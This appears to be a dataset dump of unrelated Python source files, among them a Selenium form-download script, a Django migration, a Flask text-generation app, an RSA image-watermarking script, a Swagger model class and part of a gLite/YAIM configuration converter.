text stringlengths 8 6.05M |
|---|
a="All"
b="work"
c="and"
d="no"
e="play"
f="makes"
g="Jack"
h="a"
i="dull"
j="boy"
print(a,b,c,d,e,f,g,h,i,j) |
# Agar pythonda sonlarni yaxlitlash yoki modulini olish kerak bo'ladigan bulsa u uchun special math methods bor
a=541
b=2
c=a/b
print(c)
print(round(c)) # bu sonni yaxlitlab yuboradi |
# author:lyr time:2019-11-01
import requests
rp=requests.get('http://ci.ytesting.com/api/3school/school_classes?'
'vcode=<vode>&action=list_classes_by_schoolgrade')
print(rp.status_code)
print(rp.url)
print(rp.text)
print(rp.content)
print(rp.headers)
1111
|
import time
import os
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import config
import environment
def get_options(download_path):
"""
Set downloadpath, headless option for chromedriever
:param download_path:
:return: a webdriver.options object
"""
chrome_options = webdriver.ChromeOptions()
prefs = {'download.default_directory' : download_path}
# chrome_options.headless = True
chrome_options.add_argument("--log-level=3")
chrome_options.add_argument("--window-size=1920,1080")
chrome_options.add_argument("--disable-gpu")
chrome_options.add_argument("--disable-extensions")
chrome_options.add_experimental_option("useAutomationExtension", False)
chrome_options.add_argument("--proxy-server='direct://'")
chrome_options.add_argument("--proxy-bypass-list=*")
chrome_options.add_argument("--start-maximized")
chrome_options.add_argument("--headless")
chrome_options.add_experimental_option('prefs', prefs)
return chrome_options
def extract(is_listener=False):
"""
Get latest listener or bellringer forms from askform.com (mainly used for bellringer forms).
:param is_listener:
:return:
"""
if is_listener:
print("Running extract with is_listener = True should be deprecated!")
script_dir = os.path.dirname(os.path.realpath(__file__)) #<-- absolute dir the script is in
if config.INTERNAL_TESTING:
data_abs_path = os.path.join(script_dir, "internal_testing_data/")
else:
data_abs_path = os.path.join(script_dir, "Data/")
# username_xpath = "/html/body/div[1]/div[1]/div/div[3]/div[2]/input"
username_xpath = "/html/body/section/div/div[2]/div/form/div[1]/input"
# pwd_xpath = "/html/body/div[1]/div[1]/div/div[4]/div/input"
pwd_xpath = "/html/body/section/div/div[2]/div/form/div[2]/input"
# login_button_xpath = ".//a[@onclick='askformLogin()']"
login_button_xpath = "/html/body/section/div/div[2]/div/div[2]/a"
form_menu_id = "menu4603080002"
# bell_ringer_form_xpath = ".//a[@href='/Survey/DataList.aspx?AppConfigID=4603080002&FormApplicationID=10244540001&FormCategoryID=10276160001&FormID=14461000001']"
# bell_ringer_form_xpath = "/html/body/form/div[4]/div/div/div[2]/div/div/div/div/div/div[2]/div[3]/div[3]/div/div[3]/ul/li[4]/a/span"
bell_ringer_form_xpath = "/html/body/form/div[4]/div/div/div[2]/div/div/div/div/div/div[2]/div[3]/div[1]/div/div[3]/ul/li[4]/a/span"
# bell_ringer_form_internal_test_xpath = ".//a[@href='/Survey/DataList.aspx?AppConfigID=4603080002&FormApplicationID=11631380001&FormCategoryID=11663020001&FormID=18367510001']"
# bell_ringer_form_internal_test_xpath = "/html/body/form/div[4]/div/div/div[2]/div/div/div/div/div/div[2]/div[3]/div[4]/div/div[3]/ul/li[4]/a/span"
bell_ringer_form_internal_test_xpath = "/html/body/form/div[4]/div/div/div[2]/div/div/div/div/div/div[2]/div[3]/div[1]/div/div[3]/ul/li[4]/a/span"
download_button_id = "btnExport"
# If file already exits, delete it
if os.path.exists(data_abs_path + "数据列表.xls"):
os.remove(data_abs_path + "数据列表.xls")
#form_extraction
start = time.time()
print("Starting browser...")
print("data_abs_path: ", data_abs_path)
# we can now start Firefox and it will run inside the virtual display
browser = webdriver.Chrome(chrome_options=get_options(data_abs_path))
print("Going to www.askform.cn/login ...")
browser.set_page_load_timeout(600)
browser.get("https://www.askform.cn/login")
print("Loggin in...")
try:
element = WebDriverWait(browser, 20).until(
EC.visibility_of_element_located((By.XPATH, username_xpath))
)
element.send_keys(environment.ASKFORM_LOGIN[0])
element = WebDriverWait(browser, 20).until(
EC.visibility_of_element_located((By.XPATH, pwd_xpath))
)
element.send_keys(environment.ASKFORM_LOGIN[1])
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.XPATH, login_button_xpath))
)
element.click()
print("Looking for form...")
form_menu_xpath = "/html/body/form/div[4]/div/div/div[1]/div[1]/div/div[1]/ul/li[3]/a"
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.XPATH, form_menu_xpath))
)
element.click()
# Select which form to download
if config.INTERNAL_TESTING:
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.XPATH, bell_ringer_form_internal_test_xpath))
)
element.click()
else:
if is_listener:
#this link in wrong!! Need to be changed in the future
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.XPATH, ".//a[@href='/Survey/DataList.aspx?AppConfigID=4603080002&FormApplicationID=10801670001&FormCategoryID=10833290001&FormID=16128410001']"))
)
element.click()
else:
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.XPATH, bell_ringer_form_xpath))
)
element.click()
print("Downloading...")
element = WebDriverWait(browser, 20).until(
EC.element_to_be_clickable((By.ID, download_button_id))
)
element.click()
time.sleep(5)
browser.close()
finally:
browser.quit()
end = time.time()
print("time: " + str(end - start))
def organize_form():
"""
Rename newly downloaded form/newForm.xls to newForm.xls/oldForm.xls. Delete oldForm
:return:
"""
script_dir = os.path.dirname(os.path.realpath(__file__)) #<-- absolute dir the script is in
if config.INTERNAL_TESTING:
data_abs_path = os.path.join(script_dir, "internal_testing_data/")
else:
data_abs_path = os.path.join(script_dir, "Data/")
#delete downloaded file
os.remove(data_abs_path + "oldForm.xls")
os.rename(data_abs_path + "newForm.xls", data_abs_path + "oldForm.xls")
os.rename(data_abs_path + "数据列表.xls", data_abs_path + "newForm.xls")
print("Successfully organizes the forms!")
if __name__ == '__main__':
config.config(["",""])
extract(is_listener = False)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-06-19 12:00
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("organisations", "0043_auto_20180607_1337")]
operations = [
migrations.AlterUniqueTogether(
name="organisation",
unique_together={
("official_identifier", "organisation_type", "start_date"),
("official_identifier", "organisation_type", "end_date"),
},
),
migrations.AlterUniqueTogether(
name="organisationgeography",
unique_together={
("organisation", "end_date"),
("organisation", "start_date"),
},
),
]
|
from flask import Flask, render_template, request
import test
app = Flask(__name__)
@app.route('/', methods = ["POST", "GET"])
def home():
x = ""
result = ""
y=""
if request.method == "POST":
x = request.form["string"]
y = request.form["NumChar"]
if not y:
y = 1000
else:
y = int(y)
m = test.ModelGenerator(str(x))
m.transformer()
result = test.generate_text(m.model, start_string=m.text, num_generate = y)
return render_template("index.html", content = result)
if __name__=="__main__":
app.run(debug = True)
|
'''
CS 6475
Final Project
Samuel Woo
Jassimran Kaur
'''
import numpy as np
import cv2
import hashlib
import Crypto
from Crypto.PublicKey import RSA
from Crypto import Random
from fp_functions import hash_file
from fp_functions import gen_RSA_keys
from fp_functions import sign_hash
from fp_functions import read_bits
from fp_functions import apply_watermark
from fp_functions import read_watermark
FILE_NAME = 'WadiRum5.JPG'
if __name__ == '__main__':
image = cv2.imread(FILE_NAME)
imageHash = hash_file(FILE_NAME)
key = gen_RSA_keys(1024)
signature = sign_hash(key, imageHash)
watermarkedImage = apply_watermark(signature, image)
cv2.imwrite("WatermarkedImage.png", watermarkedImage)
imageToBeRead = cv2.imread("WatermarkedImage.png")
sigLength = read_bits(signature, 0)[1]
watermark = read_watermark(imageToBeRead, sigLength)
publicKey = key.publickey()
if publicKey.verify(imageHash.digest(), watermark):
cv2.imwrite('watermarkedImage.jpg', watermarkedImage)
print 'Watermarked image saved to directory'
print 'Watermark successfully applied and verified!'
else:
print 'Signature invalid'
|
import ast
def triangular(n):
return (n*(n+1))//2
def main():
file = open("words.txt", "r")
contents = file.read()
word_lst = ast.literal_eval(contents)
word_lst = sorted(word_lst)
letter_lst = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']
triangular_lst = [triangular(i) for i in range(1,50)]
counter = 0
for word in word_lst:
value = 0
for letter in word:
value += letter_lst.index(letter)+1
if value in triangular_lst:
counter+=1
# print(word)
print(counter)
if __name__=='__main__':
main() |
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server import util
class ExposuresBundleSocioecon(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, geoid: str=None, est_total_pop: str=None, est_total_pop_se: str=None, est_total_pop25_plus: str=None, est_total_pop25_plus_se: str=None, est_prop_non_hisp_white: str=None, est_prop_non_hisp_white_se: str=None, est_prop_persons25_plus_high_school_max: str=None, est_prop_persons25_plus_high_school_max_se: str=None, est_prop_households_no_auto: str=None, est_prop_households_no_auto_se: str=None, est_prop_persons_no_health_ins: str=None, est_prop_persons_no_health_ins_se: str=None, est_prop_persons5_plus_no_english: str=None, est_prop_persons5_plus_no_english_se: str=None, median_household_income: str=None, median_household_income_se: str=None): # noqa: E501
"""ExposuresBundleSocioecon - a model defined in Swagger
:param geoid: The geoid of this ExposuresBundleSocioecon. # noqa: E501
:type geoid: str
:param est_total_pop: The est_total_pop of this ExposuresBundleSocioecon. # noqa: E501
:type est_total_pop: str
:param est_total_pop_se: The est_total_pop_se of this ExposuresBundleSocioecon. # noqa: E501
:type est_total_pop_se: str
:param est_total_pop25_plus: The est_total_pop25_plus of this ExposuresBundleSocioecon. # noqa: E501
:type est_total_pop25_plus: str
:param est_total_pop25_plus_se: The est_total_pop25_plus_se of this ExposuresBundleSocioecon. # noqa: E501
:type est_total_pop25_plus_se: str
:param est_prop_non_hisp_white: The est_prop_non_hisp_white of this ExposuresBundleSocioecon. # noqa: E501
:type est_prop_non_hisp_white: str
:param est_prop_non_hisp_white_se: The est_prop_non_hisp_white_se of this ExposuresBundleSocioecon. # noqa: E501
:type est_prop_non_hisp_white_se: str
:param est_prop_persons25_plus_high_school_max: The est_prop_persons25_plus_high_school_max of this ExposuresBundleSocioecon. # noqa: E501
:type est_prop_persons25_plus_high_school_max: str
:param est_prop_persons25_plus_high_school_max_se: The est_prop_persons25_plus_high_school_max_se of this ExposuresBundleSocioecon. # noqa: E501
:type est_prop_persons25_plus_high_school_max_se: str
:param est_prop_households_no_auto: The est_prop_households_no_auto of this ExposuresBundleSocioecon. # noqa: E501
:type est_prop_households_no_auto: str
:param est_prop_households_no_auto_se: The est_prop_households_no_auto_se of this ExposuresBundleSocioecon. # noqa: E501
:type est_prop_households_no_auto_se: str
:param est_prop_persons_no_health_ins: The est_prop_persons_no_health_ins of this ExposuresBundleSocioecon. # noqa: E501
:type est_prop_persons_no_health_ins: str
:param est_prop_persons_no_health_ins_se: The est_prop_persons_no_health_ins_se of this ExposuresBundleSocioecon. # noqa: E501
:type est_prop_persons_no_health_ins_se: str
:param est_prop_persons5_plus_no_english: The est_prop_persons5_plus_no_english of this ExposuresBundleSocioecon. # noqa: E501
:type est_prop_persons5_plus_no_english: str
:param est_prop_persons5_plus_no_english_se: The est_prop_persons5_plus_no_english_se of this ExposuresBundleSocioecon. # noqa: E501
:type est_prop_persons5_plus_no_english_se: str
:param median_household_income: The median_household_income of this ExposuresBundleSocioecon. # noqa: E501
:type median_household_income: str
:param median_household_income_se: The median_household_income_se of this ExposuresBundleSocioecon. # noqa: E501
:type median_household_income_se: str
"""
self.swagger_types = {
'geoid': str,
'est_total_pop': str,
'est_total_pop_se': str,
'est_total_pop25_plus': str,
'est_total_pop25_plus_se': str,
'est_prop_non_hisp_white': str,
'est_prop_non_hisp_white_se': str,
'est_prop_persons25_plus_high_school_max': str,
'est_prop_persons25_plus_high_school_max_se': str,
'est_prop_households_no_auto': str,
'est_prop_households_no_auto_se': str,
'est_prop_persons_no_health_ins': str,
'est_prop_persons_no_health_ins_se': str,
'est_prop_persons5_plus_no_english': str,
'est_prop_persons5_plus_no_english_se': str,
'median_household_income': str,
'median_household_income_se': str
}
self.attribute_map = {
'geoid': 'geoid',
'est_total_pop': 'EstTotalPop',
'est_total_pop_se': 'EstTotalPop_SE',
'est_total_pop25_plus': 'EstTotalPop25Plus',
'est_total_pop25_plus_se': 'EstTotalPop25Plus_SE',
'est_prop_non_hisp_white': 'EstPropNonHispWhite',
'est_prop_non_hisp_white_se': 'EstPropNonHispWhite_SE',
'est_prop_persons25_plus_high_school_max': 'EstPropPersons25PlusHighSchoolMax',
'est_prop_persons25_plus_high_school_max_se': 'EstPropPersons25PlusHighSchoolMax_SE',
'est_prop_households_no_auto': 'EstPropHouseholdsNoAuto',
'est_prop_households_no_auto_se': 'EstPropHouseholdsNoAuto_SE',
'est_prop_persons_no_health_ins': 'EstPropPersonsNoHealthIns',
'est_prop_persons_no_health_ins_se': 'EstPropPersonsNoHealthIns_SE',
'est_prop_persons5_plus_no_english': 'EstPropPersons5PlusNoEnglish',
'est_prop_persons5_plus_no_english_se': 'EstPropPersons5PlusNoEnglish_SE',
'median_household_income': 'MedianHouseholdIncome',
'median_household_income_se': 'MedianHouseholdIncome_SE'
}
self._geoid = geoid
self._est_total_pop = est_total_pop
self._est_total_pop_se = est_total_pop_se
self._est_total_pop25_plus = est_total_pop25_plus
self._est_total_pop25_plus_se = est_total_pop25_plus_se
self._est_prop_non_hisp_white = est_prop_non_hisp_white
self._est_prop_non_hisp_white_se = est_prop_non_hisp_white_se
self._est_prop_persons25_plus_high_school_max = est_prop_persons25_plus_high_school_max
self._est_prop_persons25_plus_high_school_max_se = est_prop_persons25_plus_high_school_max_se
self._est_prop_households_no_auto = est_prop_households_no_auto
self._est_prop_households_no_auto_se = est_prop_households_no_auto_se
self._est_prop_persons_no_health_ins = est_prop_persons_no_health_ins
self._est_prop_persons_no_health_ins_se = est_prop_persons_no_health_ins_se
self._est_prop_persons5_plus_no_english = est_prop_persons5_plus_no_english
self._est_prop_persons5_plus_no_english_se = est_prop_persons5_plus_no_english_se
self._median_household_income = median_household_income
self._median_household_income_se = median_household_income_se
@classmethod
def from_dict(cls, dikt) -> 'ExposuresBundleSocioecon':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The ExposuresBundle_socioecon of this ExposuresBundleSocioecon. # noqa: E501
:rtype: ExposuresBundleSocioecon
"""
return util.deserialize_model(dikt, cls)
@property
def geoid(self) -> str:
"""Gets the geoid of this ExposuresBundleSocioecon.
:return: The geoid of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._geoid
@geoid.setter
def geoid(self, geoid: str):
"""Sets the geoid of this ExposuresBundleSocioecon.
:param geoid: The geoid of this ExposuresBundleSocioecon.
:type geoid: str
"""
self._geoid = geoid
@property
def est_total_pop(self) -> str:
"""Gets the est_total_pop of this ExposuresBundleSocioecon.
:return: The est_total_pop of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_total_pop
@est_total_pop.setter
def est_total_pop(self, est_total_pop: str):
"""Sets the est_total_pop of this ExposuresBundleSocioecon.
:param est_total_pop: The est_total_pop of this ExposuresBundleSocioecon.
:type est_total_pop: str
"""
self._est_total_pop = est_total_pop
@property
def est_total_pop_se(self) -> str:
"""Gets the est_total_pop_se of this ExposuresBundleSocioecon.
:return: The est_total_pop_se of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_total_pop_se
@est_total_pop_se.setter
def est_total_pop_se(self, est_total_pop_se: str):
"""Sets the est_total_pop_se of this ExposuresBundleSocioecon.
:param est_total_pop_se: The est_total_pop_se of this ExposuresBundleSocioecon.
:type est_total_pop_se: str
"""
self._est_total_pop_se = est_total_pop_se
@property
def est_total_pop25_plus(self) -> str:
"""Gets the est_total_pop25_plus of this ExposuresBundleSocioecon.
:return: The est_total_pop25_plus of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_total_pop25_plus
@est_total_pop25_plus.setter
def est_total_pop25_plus(self, est_total_pop25_plus: str):
"""Sets the est_total_pop25_plus of this ExposuresBundleSocioecon.
:param est_total_pop25_plus: The est_total_pop25_plus of this ExposuresBundleSocioecon.
:type est_total_pop25_plus: str
"""
self._est_total_pop25_plus = est_total_pop25_plus
@property
def est_total_pop25_plus_se(self) -> str:
"""Gets the est_total_pop25_plus_se of this ExposuresBundleSocioecon.
:return: The est_total_pop25_plus_se of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_total_pop25_plus_se
@est_total_pop25_plus_se.setter
def est_total_pop25_plus_se(self, est_total_pop25_plus_se: str):
"""Sets the est_total_pop25_plus_se of this ExposuresBundleSocioecon.
:param est_total_pop25_plus_se: The est_total_pop25_plus_se of this ExposuresBundleSocioecon.
:type est_total_pop25_plus_se: str
"""
self._est_total_pop25_plus_se = est_total_pop25_plus_se
@property
def est_prop_non_hisp_white(self) -> str:
"""Gets the est_prop_non_hisp_white of this ExposuresBundleSocioecon.
:return: The est_prop_non_hisp_white of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_prop_non_hisp_white
@est_prop_non_hisp_white.setter
def est_prop_non_hisp_white(self, est_prop_non_hisp_white: str):
"""Sets the est_prop_non_hisp_white of this ExposuresBundleSocioecon.
:param est_prop_non_hisp_white: The est_prop_non_hisp_white of this ExposuresBundleSocioecon.
:type est_prop_non_hisp_white: str
"""
self._est_prop_non_hisp_white = est_prop_non_hisp_white
@property
def est_prop_non_hisp_white_se(self) -> str:
"""Gets the est_prop_non_hisp_white_se of this ExposuresBundleSocioecon.
:return: The est_prop_non_hisp_white_se of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_prop_non_hisp_white_se
@est_prop_non_hisp_white_se.setter
def est_prop_non_hisp_white_se(self, est_prop_non_hisp_white_se: str):
"""Sets the est_prop_non_hisp_white_se of this ExposuresBundleSocioecon.
:param est_prop_non_hisp_white_se: The est_prop_non_hisp_white_se of this ExposuresBundleSocioecon.
:type est_prop_non_hisp_white_se: str
"""
self._est_prop_non_hisp_white_se = est_prop_non_hisp_white_se
@property
def est_prop_persons25_plus_high_school_max(self) -> str:
"""Gets the est_prop_persons25_plus_high_school_max of this ExposuresBundleSocioecon.
:return: The est_prop_persons25_plus_high_school_max of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_prop_persons25_plus_high_school_max
@est_prop_persons25_plus_high_school_max.setter
def est_prop_persons25_plus_high_school_max(self, est_prop_persons25_plus_high_school_max: str):
"""Sets the est_prop_persons25_plus_high_school_max of this ExposuresBundleSocioecon.
:param est_prop_persons25_plus_high_school_max: The est_prop_persons25_plus_high_school_max of this ExposuresBundleSocioecon.
:type est_prop_persons25_plus_high_school_max: str
"""
self._est_prop_persons25_plus_high_school_max = est_prop_persons25_plus_high_school_max
@property
def est_prop_persons25_plus_high_school_max_se(self) -> str:
"""Gets the est_prop_persons25_plus_high_school_max_se of this ExposuresBundleSocioecon.
:return: The est_prop_persons25_plus_high_school_max_se of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_prop_persons25_plus_high_school_max_se
@est_prop_persons25_plus_high_school_max_se.setter
def est_prop_persons25_plus_high_school_max_se(self, est_prop_persons25_plus_high_school_max_se: str):
"""Sets the est_prop_persons25_plus_high_school_max_se of this ExposuresBundleSocioecon.
:param est_prop_persons25_plus_high_school_max_se: The est_prop_persons25_plus_high_school_max_se of this ExposuresBundleSocioecon.
:type est_prop_persons25_plus_high_school_max_se: str
"""
self._est_prop_persons25_plus_high_school_max_se = est_prop_persons25_plus_high_school_max_se
@property
def est_prop_households_no_auto(self) -> str:
"""Gets the est_prop_households_no_auto of this ExposuresBundleSocioecon.
:return: The est_prop_households_no_auto of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_prop_households_no_auto
@est_prop_households_no_auto.setter
def est_prop_households_no_auto(self, est_prop_households_no_auto: str):
"""Sets the est_prop_households_no_auto of this ExposuresBundleSocioecon.
:param est_prop_households_no_auto: The est_prop_households_no_auto of this ExposuresBundleSocioecon.
:type est_prop_households_no_auto: str
"""
self._est_prop_households_no_auto = est_prop_households_no_auto
@property
def est_prop_households_no_auto_se(self) -> str:
"""Gets the est_prop_households_no_auto_se of this ExposuresBundleSocioecon.
:return: The est_prop_households_no_auto_se of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_prop_households_no_auto_se
@est_prop_households_no_auto_se.setter
def est_prop_households_no_auto_se(self, est_prop_households_no_auto_se: str):
"""Sets the est_prop_households_no_auto_se of this ExposuresBundleSocioecon.
:param est_prop_households_no_auto_se: The est_prop_households_no_auto_se of this ExposuresBundleSocioecon.
:type est_prop_households_no_auto_se: str
"""
self._est_prop_households_no_auto_se = est_prop_households_no_auto_se
@property
def est_prop_persons_no_health_ins(self) -> str:
"""Gets the est_prop_persons_no_health_ins of this ExposuresBundleSocioecon.
:return: The est_prop_persons_no_health_ins of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_prop_persons_no_health_ins
@est_prop_persons_no_health_ins.setter
def est_prop_persons_no_health_ins(self, est_prop_persons_no_health_ins: str):
"""Sets the est_prop_persons_no_health_ins of this ExposuresBundleSocioecon.
:param est_prop_persons_no_health_ins: The est_prop_persons_no_health_ins of this ExposuresBundleSocioecon.
:type est_prop_persons_no_health_ins: str
"""
self._est_prop_persons_no_health_ins = est_prop_persons_no_health_ins
@property
def est_prop_persons_no_health_ins_se(self) -> str:
"""Gets the est_prop_persons_no_health_ins_se of this ExposuresBundleSocioecon.
:return: The est_prop_persons_no_health_ins_se of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_prop_persons_no_health_ins_se
@est_prop_persons_no_health_ins_se.setter
def est_prop_persons_no_health_ins_se(self, est_prop_persons_no_health_ins_se: str):
"""Sets the est_prop_persons_no_health_ins_se of this ExposuresBundleSocioecon.
:param est_prop_persons_no_health_ins_se: The est_prop_persons_no_health_ins_se of this ExposuresBundleSocioecon.
:type est_prop_persons_no_health_ins_se: str
"""
self._est_prop_persons_no_health_ins_se = est_prop_persons_no_health_ins_se
@property
def est_prop_persons5_plus_no_english(self) -> str:
"""Gets the est_prop_persons5_plus_no_english of this ExposuresBundleSocioecon.
:return: The est_prop_persons5_plus_no_english of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_prop_persons5_plus_no_english
@est_prop_persons5_plus_no_english.setter
def est_prop_persons5_plus_no_english(self, est_prop_persons5_plus_no_english: str):
"""Sets the est_prop_persons5_plus_no_english of this ExposuresBundleSocioecon.
:param est_prop_persons5_plus_no_english: The est_prop_persons5_plus_no_english of this ExposuresBundleSocioecon.
:type est_prop_persons5_plus_no_english: str
"""
self._est_prop_persons5_plus_no_english = est_prop_persons5_plus_no_english
@property
def est_prop_persons5_plus_no_english_se(self) -> str:
"""Gets the est_prop_persons5_plus_no_english_se of this ExposuresBundleSocioecon.
:return: The est_prop_persons5_plus_no_english_se of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._est_prop_persons5_plus_no_english_se
@est_prop_persons5_plus_no_english_se.setter
def est_prop_persons5_plus_no_english_se(self, est_prop_persons5_plus_no_english_se: str):
"""Sets the est_prop_persons5_plus_no_english_se of this ExposuresBundleSocioecon.
:param est_prop_persons5_plus_no_english_se: The est_prop_persons5_plus_no_english_se of this ExposuresBundleSocioecon.
:type est_prop_persons5_plus_no_english_se: str
"""
self._est_prop_persons5_plus_no_english_se = est_prop_persons5_plus_no_english_se
@property
def median_household_income(self) -> str:
"""Gets the median_household_income of this ExposuresBundleSocioecon.
:return: The median_household_income of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._median_household_income
@median_household_income.setter
def median_household_income(self, median_household_income: str):
"""Sets the median_household_income of this ExposuresBundleSocioecon.
:param median_household_income: The median_household_income of this ExposuresBundleSocioecon.
:type median_household_income: str
"""
self._median_household_income = median_household_income
@property
def median_household_income_se(self) -> str:
"""Gets the median_household_income_se of this ExposuresBundleSocioecon.
:return: The median_household_income_se of this ExposuresBundleSocioecon.
:rtype: str
"""
return self._median_household_income_se
@median_household_income_se.setter
def median_household_income_se(self, median_household_income_se: str):
"""Sets the median_household_income_se of this ExposuresBundleSocioecon.
:param median_household_income_se: The median_household_income_se of this ExposuresBundleSocioecon.
:type median_household_income_se: str
"""
self._median_household_income_se = median_household_income_se
|
################################################################################
#
# Copyright (c) Members of the EGEE Collaboration. 2004.
# See http://eu-egee.org/partners/ for details on the copyright holders.
# For license conditions see the license file or http://eu-egee.org/license.html
#
################################################################################
import os
import re
import sys
import getopt
import shutil
import xmlUtils
from xml.dom.minidom import Node
from xml.dom.minidom import parse, parseString
from xmlUtils import gliteXMLWriter
from xmlUtils import UltraPrettyPrint
from xmlUtils import GliteUIsetParams
global vo, map, defaults, yaim_file, environ
def isGliteScalar( node ):
return not node.hasChildNodes()
def isArray( value ):
return value.count( '"' ) > 0 or value.count( "'" ) > 0
def updateArrayParameter( node, value, yaimParam, description = '' ):
if not value.strip() == '':
externQuote = value.strip()[0]
if externQuote in ('"',"'"):
quoteCount = value.count( externQuote )
splitChar = externQuote
if quoteCount % 2 > 0:
print "possible problems: odd number of quotes found"
elif quoteCount == 2:
value = value.strip( externQuote )
splitChar = ' '
else:
splitChar = ' '
#value = value.strip( externQuote )
# parse array items from value
itemValues = value.split( splitChar )
else:
itemValues = []
# cleanup of empty entries
if isGliteScalar( node ):
updateParamNode( node, itemValues[0], yaimParam, description )
else:
for i in range( len( itemValues ) - 1, -1, -1 ):
if stripQuotes( itemValues[i] ) == '':
itemValues.remove( itemValues[i] )
# remove all existing values from array
for child in range( len( node.childNodes ) - 1, -1, -1 ):
node.removeChild( node.childNodes[child] )
if description == '':
description = 'Parameter defined in %s by YAIM parameter %s'\
% ( yaim_file, yaimParam )
node.setAttribute( 'description', description )
# Add special treatement for SE_LIST
itemValues1 = []
if yaimParam == 'SE_LIST':
# for item in itemValues:
# itemValues1.append( "'.' %s /tmp" % item )
for item in xrange( len( itemValues ) ):
try:
itemValues1.append( "'.' %s %s" % ( itemValues[item], \
stripQuotes( replaceParameter( environ['CLASSIC_STORAGE_DIR'] )\
.split( ' ' )[item] ) ) )
except:
itemValues1.append( "'.' %s /tmp" % itemValues[item] )
itemValues = itemValues1
# add new items to array
if len( itemValues ) == 0:
itemValues = ['']
for value in itemValues:
newDoc = parseString( '<value/>' )
newItem = newDoc.documentElement
if not value.strip() == '':
newItem.appendChild( newDoc.createTextNode( value.strip() ) )
node.appendChild( newItem )
def multiSplit( string, split ):
ret = []
start = 0
for pos in range( 0, len( string ) ):
if string[pos] in split:
ret.append( string[start:pos] )
start = pos + 1
ret.append( stripQuotes( string[start:] ) )
return ret
def replaceParameter( value ):
ignore = []
while not value.count( '$' ) == len( ignore ):
if value.find( '${' ) > -1:
start = value.find( '${' )
stop = value.find( '}' )
parameter = value[ start : stop + 1 ]
if not parameter[2:-1] in ignore:
if environ.has_key( parameter[2:-1] ):
value = value.replace( parameter, stripQuotes( environ[parameter[2:-1]] ) )
else:
ignore.append( parameter[2:-1] )
elif value.find( '$' ) > -1:
tmp = value[value.find( '$' ):].strip()
parameter = multiSplit( tmp, '/: ' )[0]
if not parameter[1:] in ignore:
if environ.has_key( parameter[1:] ):
value = value.replace( parameter, stripQuotes( environ[parameter[1:]] ) )
else:
ignore.append( parameter[1:] )
return value
def updateParamNode( node, value, yaimParam, description = '' ):
# if isArray(value) == isGliteArray(node):
value = replaceParameter( value )
if isGliteScalar( node ):
valueNodes = node.getElementsByTagName( 'value' )
if len( valueNodes ) == 0:
node.setAttribute( 'value', value )
else:
updateArrayParameter( node, "'%s'" % value, yaimParam, description )
else:
updateArrayParameter( node, value, yaimParam, description )
if description == '':
node.setAttribute( 'description', 'Parameter defined in %s by YAIM parameter %s'\
% ( yaim_file, yaimParam ) )
else:
node.setAttribute( 'description', description )
def mapYaim2gLite( param ):
if map.has_key( param ):
ret = map[param]
else:
ret = [param]
return ret
def createContainer( tag, name ):
container = "<%s name='%s'><parameters/></%s>" \
%( tag.lower(), name.lower(), tag.lower() )
node = parseString( container )
return node.documentElement
def createParameter( voName, value, yaimParam ):
for param in mapYaim2gLite( yaimParam ):
paramNode=parseString( "<%s/>" % param ).documentElement
updateParamNode( paramNode, value, yaimParam )
vo[voName].getElementsByTagName( 'parameters' )[0].appendChild( paramNode )
def stripQuotes( param ):
return param.strip( '"' ).strip( "'" ).strip()
def getPoolName( vo ):
user = ( '', '' )
users = open( replaceParameter( environ['USERS_CONF'] ) ).readlines()
for line in users:
line = line.strip()
if not line == '' and not line[0] == '#':
if line.split( ':' )[4].lower() == vo.lower():
# user = ( <first pool account name>, <pool group>)
user = ( line.split( ':' )[1], line.split( ':' )[3] )
break
return user
def updateContainerParameter( yaimName, value ):
( tag, tagName, param ) = yaimName.split( '_', 2 )
tagName = tagName.lower()
# ToDo: Put case insensitive check on the VO name
if tagName in stripQuotes( environ['VOS'].lower() ).split():
if not vo.has_key( tagName ):
vo[tagName] = xmlUtils.getContainerTemplate( 'vo-template' )
vo[tagName].setAttribute( 'name', tagName )
# create default VO parameter structure
# default: pool account creation disabled
( name, group ) = getPoolName ( tagName )
base = name.rstrip( '0123456789' )
createParameter( tagName, base, 'pool.account.basename' )
createParameter( tagName, group, 'pool.account.group' )
createParameter( tagName, tagName.lower(), 'vo.name' )
if param == 'VOMSES':
if value.strip() != '':
updateParamNode( vo[tagName].getElementsByTagName( 'vo.name' )[0], \
stripQuotes( value.split( ' ' )[0] ), 'vo.name' )
updateParamNode( vo[tagName].getElementsByTagName( 'voms.hostname' )[0], \
value.split( ' ' )[1], 'voms.hostname' )
updateParamNode( vo[tagName].getElementsByTagName( 'voms.port.number' )[0], \
value.split( ' ' )[2], 'voms.port.number' )
